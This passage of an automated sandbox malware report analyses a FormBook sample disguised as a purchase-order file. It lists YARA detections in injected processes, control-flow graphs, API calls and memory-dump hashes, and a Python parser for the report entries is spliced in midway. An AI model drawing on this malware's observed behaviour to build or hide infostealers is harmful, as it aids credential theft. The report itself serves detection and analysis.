                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:18
                                                                                                            Start time:10:42:58
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\runas.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\runas.exe"
                                                                                                            Imagebase:0x670000
                                                                                                            File size:17'920 bytes
                                                                                                            MD5 hash:13646BC81C39130487DA538B2DED5B28
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:19
                                                                                                            Start time:10:43:11
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe"
                                                                                                            Imagebase:0x40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:20
                                                                                                            Start time:10:43:24
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:7.4%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:32
                                                                                                              Total number of Limit Nodes:5
                                                                                                              execution_graph (node and edge listing omitted; the graphed paths call GetModuleHandleW, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId and CreateActCtxA)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ec10b82f10bb338d0d833b90ac272e63a9f0f17e688671c48394feacb26aed5c
                                                                                                              • Instruction ID: 11860d99f373c7ac6add1f586a2f38c7b4e7906dcc8e4637a7ec6601ba14e08b
                                                                                                              • Opcode Fuzzy Hash: ec10b82f10bb338d0d833b90ac272e63a9f0f17e688671c48394feacb26aed5c
                                                                                                              • Instruction Fuzzy Hash: FD61B570E012199FDF08DFA9D9949EEBBF2FF88304F148529D409AB364DB359946CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd087d13c7c3235d32f5b0aac363d71ecce3f18e03612d5f7ef200461ec65523
                                                                                                              • Instruction ID: 546d0e898d0eea0118639c1ea2b4137bdc904d14c6daffac71fbae42662e07fa
                                                                                                              • Opcode Fuzzy Hash: fd087d13c7c3235d32f5b0aac363d71ecce3f18e03612d5f7ef200461ec65523
                                                                                                              • Instruction Fuzzy Hash: 9251B370E012199FDF08DFA9D994AEEBBF2BF88304F148529D409AB364DB359946CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 574c242b1307df7d5b270340c8013b75ce6461f5e803462a88667e702f66e516
                                                                                                              • Instruction ID: 41e9b3b6ca1760e6f01c85bd5c30fd9d552c7d77584886a195bfa05e558dfcce
                                                                                                              • Opcode Fuzzy Hash: 574c242b1307df7d5b270340c8013b75ce6461f5e803462a88667e702f66e516
                                                                                                              • Instruction Fuzzy Hash: A1215B317493D65FC716677C082853D7FA6AFC2204B1A45BAD94ACB3D2EF24C80A8397

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph (basic-block and edge listing for 133d578-133d745 omitted; the API calls it contains are listed under APIs below)
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0133D5F6
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0133D633
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0133D670
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0133D6C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 7c478a79d26d10d80a9494c10a2d335262aae2bce8fc9681c3f431d7fc34574a
                                                                                                              • Instruction ID: 5719ef6ebcd67a24f81e4f3440142f4173683152e46e73d86c86acba5d861fc2
                                                                                                              • Opcode Fuzzy Hash: 7c478a79d26d10d80a9494c10a2d335262aae2bce8fc9681c3f431d7fc34574a
                                                                                                              • Instruction Fuzzy Hash: AD5167B4D002498FDB08CFAAD548BDEBBF5BF88318F208559D419A7360D7349984CF69

                                                                                                              Control-flow Graph
                                                                                                              control_flow_graph 570 133aed7-133aef7 571 133af23-133af27 570->571 572 133aef9-133af06 call 133a240 570->572 574 133af3b-133af7c 571->574 575 133af29-133af33 571->575 577 133af08 572->577 578 133af1c 572->578 581 133af89-133af97 574->581 582 133af7e-133af86 574->582 575->574 625 133af0e call 133b180 577->625 626 133af0e call 133b17f 577->626 578->571 583 133afbb-133afbd 581->583 584 133af99-133af9e 581->584 582->581 589 133afc0-133afc7 583->589 586 133afa0-133afa7 call 133a24c 584->586 587 133afa9 584->587 585 133af14-133af16 585->578 588 133b058-133b118 585->588 591 133afab-133afb9 586->591 587->591 620 133b120-133b14b GetModuleHandleW 588->620 621 133b11a-133b11d 588->621 592 133afd4-133afdb 589->592 593 133afc9-133afd1 589->593 591->589 595 133afe8-133aff1 call 133a25c 592->595 596 133afdd-133afe5 592->596 593->592 601 133aff3-133affb 595->601 602 133affe-133b003 595->602 596->595 601->602 603 133b021-133b02e 602->603 604 133b005-133b00c 602->604 611 133b051-133b057 603->611 612 133b030-133b04e 603->612 604->603 606 133b00e-133b01e call 133a26c call 133a27c 604->606 606->603 612->611 622 133b154-133b168 620->622 623 133b14d-133b153 620->623 621->620 623->622 625->585 626->585
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B13E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 20018373a3f89381c61cf4a7f2fee064b844df7e8b4b181c5b79b1049e48aa8a
                                                                                                              • Instruction ID: 5eea3c1b44ff7c987f81b8e4f914d659d1d60ecb16d73096e3da06467c6065fe
                                                                                                              • Opcode Fuzzy Hash: 20018373a3f89381c61cf4a7f2fee064b844df7e8b4b181c5b79b1049e48aa8a
                                                                                                              • Instruction Fuzzy Hash: 6C8144B0A00B458FD725DF29D45479ABBF1FF88308F008A2ED48ADBA50D735E849CB95

                                                                                                              Control-flow Graph
                                                                                                              control_flow_graph 735 13344e0-13359d9 CreateActCtxA 738 13359e2-1335a3c 735->738 739 13359db-13359e1 735->739 746 1335a4b-1335a4f 738->746 747 1335a3e-1335a41 738->747 739->738 748 1335a51-1335a5d 746->748 749 1335a60 746->749 747->746 748->749 751 1335a61 749->751 751->751
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 566e22680c3209076fb8a2a49d98450bde6c92f9302fcfc285cfcb8cb1f6cdfc
                                                                                                              • Instruction ID: 2f77abc9d5e1077c04428a2b2dbdecb4b94d19a4dbac5dc048fa470493841372
                                                                                                              • Opcode Fuzzy Hash: 566e22680c3209076fb8a2a49d98450bde6c92f9302fcfc285cfcb8cb1f6cdfc
                                                                                                              • Instruction Fuzzy Hash: 9A41D0B0C0075DCBDB25CFA9C884B9EBBF5BF89304F24806AD408AB255DB756946CF90

                                                                                                              Control-flow Graph
                                                                                                              control_flow_graph 752 1335913-13359d9 CreateActCtxA 754 13359e2-1335a3c 752->754 755 13359db-13359e1 752->755 762 1335a4b-1335a4f 754->762 763 1335a3e-1335a41 754->763 755->754 764 1335a51-1335a5d 762->764 765 1335a60 762->765 763->762 764->765 767 1335a61 765->767 767->767
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: c86c77b3b648e6e13e218e54262db6b23d28df85dbbda1c8f576759b3c0d2f13
                                                                                                              • Instruction ID: 536c6034044cc5479985b03133a9d01ac724be86ef7ad49e0ff9e8626a24628d
                                                                                                              • Opcode Fuzzy Hash: c86c77b3b648e6e13e218e54262db6b23d28df85dbbda1c8f576759b3c0d2f13
                                                                                                              • Instruction Fuzzy Hash: DB41C2B1C00759CEDB25CFA9C884BDEBBF5BF89304F24806AD408AB255DB755946CF90

                                                                                                              Control-flow Graph
                                                                                                              control_flow_graph 768 133d7c0-133d854 DuplicateHandle 769 133d856-133d85c 768->769 770 133d85d-133d87a 768->770 769->770
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D847
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 0c9219d840502e7358fc0f6f9a51dedd9d9e194889926c5346183e4562ac0454
                                                                                                              • Instruction ID: d7d7a8b774eb35920e06b2b3b6daf6a00e9bbd4ff4a94288b6ba7b4e4afc241b
                                                                                                              • Opcode Fuzzy Hash: 0c9219d840502e7358fc0f6f9a51dedd9d9e194889926c5346183e4562ac0454
                                                                                                              • Instruction Fuzzy Hash: 3621E2B59002089FDB10CFAAD984ADEBFF8EB48324F14801AE918A7310C374A944CFA4

                                                                                                              Control-flow Graph
                                                                                                              control_flow_graph 773 133b0d8-133b118 774 133b120-133b14b GetModuleHandleW 773->774 775 133b11a-133b11d 773->775 776 133b154-133b168 774->776 777 133b14d-133b153 774->777 775->774 777->776
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B13E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: b8e417bc757762db2b3626eadae81fa1ea98a5be077cc3792c1fc5f4ac5a75d3
                                                                                                              • Instruction ID: 58ca09ba5dd45413b41c6c26140549ae57252b106dd38fe8d57e051b4873821f
                                                                                                              • Opcode Fuzzy Hash: b8e417bc757762db2b3626eadae81fa1ea98a5be077cc3792c1fc5f4ac5a75d3
                                                                                                              • Instruction Fuzzy Hash: 5111E0B5C002498FDB10CF9AD844ADEFBF4AB88324F10842AD959A7314C375A545CFA5
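The function entries above are machine output: a flattened control-flow-graph token stream, the API references the disassembler resolved, the memory dump region, and the Opcode ID / Instruction ID pair the report uses for similarity. The following added example is not part of the Joe Sandbox report or of Joe Sandbox's own tooling; it parses that text form into per-function records so the API references and the Opcode/Instruction IDs can be pivoted on across entries (which functions touch DuplicateHandle, which entries share an Opcode ID). SAMPLE is a constructed excerpt copied from the entries above; the node-id heuristic in parse_cfg, the record field names (entry, dump_offset, cfg_apis) and the reading of Opcode ID versus Instruction ID as opcode-only versus full-instruction hashes are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function entries (control_flow_graph line, APIs,
Memory Dump Source, Similarity fields) into records for triage pivots.
Added example, not part of the Joe Sandbox report or product."""
import re
from collections import defaultdict

# Constructed sample: verbatim lines copied from the report entries above.
SAMPLE = """\
Control-flow Graph
control_flow_graph 768 133d7c0-133d854 DuplicateHandle 769 133d856-133d85c 768->769 770 133d85d-133d87a 768->770 769->770
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D847
Memory Dump Source
• Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 0c9219d840502e7358fc0f6f9a51dedd9d9e194889926c5346183e4562ac0454
• Instruction ID: d7d7a8b774eb35920e06b2b3b6daf6a00e9bbd4ff4a94288b6ba7b4e4afc241b
• Instruction Fuzzy Hash: 3621E2B59002089FDB10CFAAD984ADEBFF8EB48324F14801AE918A7310C374A944CFA4
Control-flow Graph
control_flow_graph 773 133b0d8-133b118 774 133b120-133b14b GetModuleHandleW 773->774 775 133b11a-133b11d 773->775 776 133b154-133b168 774->776 777 133b14d-133b153 774->777 775->774 777->776
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0133B13E
Memory Dump Source
• Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
• Opcode ID: b8e417bc757762db2b3626eadae81fa1ea98a5be077cc3792c1fc5f4ac5a75d3
• Instruction ID: 58ca09ba5dd45413b41c6c26140549ae57252b106dd38fe8d57e051b4873821f
• Instruction Fuzzy Hash: 5111E0B5C002498FDB10CF9AD844ADEFBF4AB88324F10842AD959A7314C375A545CFA5
Memory Dump Source
• Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: 548e418e94ca63aaeba677fca580080068886134814e28260e268581ddce2294
• Instruction Fuzzy Hash: AA11BB75504284DFDB02CF54C5C8B15BFA1FB84224F24C6AAD9494B297C33AD40ACB61
Memory Dump Source
• Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
• Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
• Instruction ID: 40d65b2d6505f8c138cab06617c4e934032fa005cb4b460ea41412ed1fcff82e
• Instruction Fuzzy Hash: 2F11DD75504284CFDB12CF58D5C8B16FFA2FB84314F28C6AAD9094B656C33BD40ACBA2
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*?)\))?,? ref: ([0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^• ([^:]+): ?(.*)$")
NODE_ID_RE = re.compile(r"^\d{1,5}$")   # assumption: block ids are small decimals, addresses 7-8 hex digits
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


def parse_cfg(line):
    """Decode one 'control_flow_graph ...' token stream: '<id> <start>[-<end>]' per basic
    block, optionally followed by 'call <addr>' (internal call) or an imported API name,
    with '<src>-><dst>' edges interleaved. Returns entry address, blocks, edges, APIs."""
    tokens = line.split()[1:]
    nodes, edges, apis, calls = {}, [], [], []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            m = RANGE_RE.match(tokens[i + 1])
            nodes[int(tok)] = (int(m.group(1), 16), int(m.group(2) or m.group(1), 16))
            i += 1
        elif tok == "call" and i + 1 < len(tokens):
            calls.append(int(tokens[i + 1], 16))
            i += 1
        else:
            apis.append(tok)                      # imported API named on a block
        i += 1
    entry = min(s for s, _ in nodes.values()) if nodes else None
    return {"entry": entry, "nodes": nodes, "edges": edges, "cfg_apis": apis, "calls": calls}


def parse_entries(text):
    """One record per function; an entry ends at its 'Instruction Fuzzy Hash' line.
    Section labels and legend bullets without a colon are skipped."""
    records, rec = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph"):
            rec.update(parse_cfg(line))
        elif (m := API_RE.match(line)):
            rec["apis"].append({"name": m.group(1), "module": m.group(2),
                                "args": m.group(3), "ref": int(m.group(4), 16)})
        elif (m := KV_RE.match(line)):
            key, val = m.group(1), m.group(2)
            if key == "Source File":
                src, off, pe = re.match(r"(.*?), Offset: ([0-9A-Fa-f]+), based on PE: (\w+)", val).groups()
                rec.update(dump=src, dump_offset=int(off, 16), based_on_pe=(pe == "true"))
            else:
                rec[key] = val
            if key == "Instruction Fuzzy Hash":
                records.append(rec)
                rec = {"apis": []}
    return records


def api_usage(records):
    """Map each referenced API name to the entry addresses of functions that reach it."""
    calls = defaultdict(list)
    for r in records:
        for a in r["apis"]:
            calls[a["name"]].append(r.get("entry"))
    return dict(calls)


def duplicate_opcode_ids(records):
    """Group entries sharing an Opcode ID. Same Opcode ID with different Instruction IDs
    reads as the same opcode sequence with different operand bytes (assumed meaning of the
    two fields), i.e. one function present more than once in the dumps."""
    groups = defaultdict(list)
    for r in records:
        if "Opcode ID" in r:
            groups[r["Opcode ID"]].append((r.get("dump_offset"), r.get("Instruction ID")))
    return {k: v for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for r in recs:
        print(hex(r["entry"]) if r.get("entry") else "no cfg", [a["name"] for a in r["apis"]], r["Opcode ID"][:16])
    print(api_usage(recs))
    print(duplicate_opcode_ids(recs))
```

Run it against the full report text rather than SAMPLE to get the complete API-to-function map; the two 012ED000 entries above with the same Opcode ID but different Instruction IDs are what duplicate_opcode_ids surfaces.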
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800899210.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12dd000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f07800970bcfbc69f279d55ef3b6d60c19ac86a1d07088981798bec3b0d2553
                                                                                                              • Instruction ID: b2e0524271251b7981f15ebd21e7e9a6d6718850adbaf303f2a18dbcbf5309a5
                                                                                                              • Opcode Fuzzy Hash: 9f07800970bcfbc69f279d55ef3b6d60c19ac86a1d07088981798bec3b0d2553
                                                                                                              • Instruction Fuzzy Hash: 48216771550648DFCB01DF58E9C0F27BF65FB88318F20C169E9090B296C336D446CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09b31c710467beadb89a182b2020523ec124d592f3611a27e7ceed1a9b2a5273
                                                                                                              • Instruction ID: 62d1fc9ec67c14eb6e2d633798b2f41fb131d5f0c2902100a8154501533e04f7
                                                                                                              • Opcode Fuzzy Hash: 09b31c710467beadb89a182b2020523ec124d592f3611a27e7ceed1a9b2a5273
                                                                                                              • Instruction Fuzzy Hash: A1216470214208DFCB11DF68D9C8B26BFA1FB84314F68C56DD90A4B256C37BD407CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fcdb05f5c03d7461c0013761913e63bb9cff11e54e161be8f2ca44987fb0c308
                                                                                                              • Instruction ID: 2ff4960f4881194145a9fa1aca76cef6d897c87938053baf82d42d36d9d22294
                                                                                                              • Opcode Fuzzy Hash: fcdb05f5c03d7461c0013761913e63bb9cff11e54e161be8f2ca44987fb0c308
                                                                                                              • Instruction Fuzzy Hash: F3214975514208DFDB01DF98C5C8B26BBE5FB84324F60C56DD9094F297C376D446CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800899210.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12dd000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: 02042dc29d0042f5f53f6d94a7b57d1d3d56dbd51acb29ca2a778e13abf10fac
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 1E110376404284CFCB12CF54D5C4B16BF71FB84318F24C6A9D9090B257C336D45ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 548e418e94ca63aaeba677fca580080068886134814e28260e268581ddce2294
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: AA11BB75504284DFDB02CF54C5C8B15BFA1FB84224F24C6AAD9494B297C33AD40ACB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 40d65b2d6505f8c138cab06617c4e934032fa005cb4b460ea41412ed1fcff82e
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 2F11DD75504284CFDB12CF58D5C8B16FFA2FB84314F28C6AAD9094B656C33BD40ACBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1814235426.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7710000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 74d8fa4303ee8d1cc6dbacb07b6ee1f2d1b0ec9603736804555467c1cd73866c
                                                                                                              • Instruction ID: 10724ca1de8ed795a96e7d747ef89b3568d64899bcbfc475bb782bec47772d35
                                                                                                              • Opcode Fuzzy Hash: 74d8fa4303ee8d1cc6dbacb07b6ee1f2d1b0ec9603736804555467c1cd73866c
                                                                                                              • Instruction Fuzzy Hash: 5AE10CB4E101199FDB14DFA9C5809AEFBB2FF89305F24C26AD414A7356DB31A941CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1814235426.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1813982353.0000000007710000.00000004.08000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7710000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1aab60048fcdb6947a88e842c38e2b9c89defab92f2de99484528fc82bc378a6
                                                                                                              • Instruction ID: 194719a59fbd7b81cd5e7b13d76f200f20a100fee6638fc880366a34786bcf27
                                                                                                              • Opcode Fuzzy Hash: 1aab60048fcdb6947a88e842c38e2b9c89defab92f2de99484528fc82bc378a6
                                                                                                              • Instruction Fuzzy Hash: E5E10CB4E001199FDB14DF99C5809AEFBB2FF89305F24C66AD414A7356DB30A941CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1814235426.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: true
